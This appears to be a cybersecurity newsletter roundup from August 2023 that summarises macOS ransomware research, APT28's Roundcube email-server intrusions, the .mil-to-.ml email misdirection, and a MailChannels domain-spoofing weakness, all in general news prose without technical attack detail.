Mac Ransomware Alert, Russian Email Espionage, UK Email Redirect – Cybersecurity News [August 7, 2023]

In this latest email security news update, we bring you up to speed with the latest email scams and related updates.

Microsoft: There are Ransomware Issues on Apple’s macOS Platform

Microsoft security researchers recently flagged ransomware problems on Apple’s macOS operating system. They warned that financially motivated hackers could abuse legitimate macOS features to evade defenses, exploit vulnerabilities, and infect devices with Search Marquis or other types of malware.

Microsoft shared a blog post that contained research findings into four macOS ransomware families. It also includes technical details and IOCs showing how financially motivated cybercriminals target macOS-powered devices.

“While the documented malware families are old, they show us the capabilities of threat actors exploiting the [Mac] platform,” Redmond noted, while further elaborating that their work could serve as a “technical reference” for researchers. These experts can leverage it to extend their understanding of MacOS threats, and importantly, to enhance ransomware protection measures, thereby bolstering defenses against such attacks.

Russian Cyber Espionage Group Targets Roundcube Email Servers

A threat group that researchers are tracking as APT28 recently breached Roundcube email servers of multiple Ukrainian organizations and government entities. The APT28 threat group is linked to Russia’s GRU (General Staff Main Intelligence Directorate).

In these attacks, the APT28 cyber-espionage group (also called Fancy Bear, Sednit, BlueDelta, and Sofacy) took advantage of the ongoing Russia-Ukraine conflict and tricked recipients into opening emails that exploited Roundcube Webmail vulnerabilities for hacking into unpatched servers.

After they hacked the email servers, the cyber-espionage group deployed malicious scripts which redirected all incoming emails on targeted individuals’ servers to an attacker-controlled email address. Hackers used these scripts for reconnaissance and stealing victims’ Roundcube session cookies, address books, and other information.

According to a joint investigation by Ukraine’s CERT-UA (Computer Emergency Response Team) and Recorded Future’s Insikt Group, the threat group wanted to steal military intelligence to support the Russian invasion of Ukraine.

UK MoD Mistakenly Redirects Emails To Russia’s Ally Instead Of US

According to a recent finding, millions of emails sent to .mil US military addresses got redirected to .ml addresses, a top-level domain of Mali (Africa), for a decade! As a result of the typo, maps of military installations, identity documents, bookings for high-ranking military leaders, travel itineraries, medical data, and other data were sent to the .ml addresses rather than the .mil ones.

Responding to questions about why the US military could not detect the email leaks for so long, the US Department of Defense said it was aware of the goof-up and took “all unauthorized disclosures of Controlled Unclassified Information or Controlled National Security Information seriously.”

An Email Security Vendor Left Around 2M Domains Open To Phishing Hacks: Study

According to research shared with Axios, a security researcher uncovered how to spoof around 2 million email domain names to launch phishing attacks requiring little or no expertise. Salvati’s research focuses on MailChannels, the email security vendor which offers tools for businesses looking to send automated communications to their customers, like newsletters through emails.

Typically, such businesses need customers to prove they are domain owners before they use it to send an email.

Unlike traditional systems, MailChannels is principally designed to cater to web-hosting services that convey emails on behalf of their clients, such as email signup confirmations or password reset emails. Rather than using conventional methods, it takes advantage of spam filtering and other spam detection tools to gauge the reputation of users’ IP addresses and analyze their historical behavior.

Furthermore, it scans the email’s portions before sending it out. Salvati built a tool that enabled anyone to send emails from whichever MailChannels’ customer domain name they wish to without verifying whether they own the domain.

In one example, Salvati spoofed the domain name of the Black Hat hacking conference organized in Vegas this week.

As long as the email looked harmless, malicious actors’ emails were not flagged by the company’s default cybersecurity features. Any hacker who wanted to do this only needed $80 to sign up for a MailChannels account and gain access. The incident highlights the importance of email security in today’s evolving threat landscape.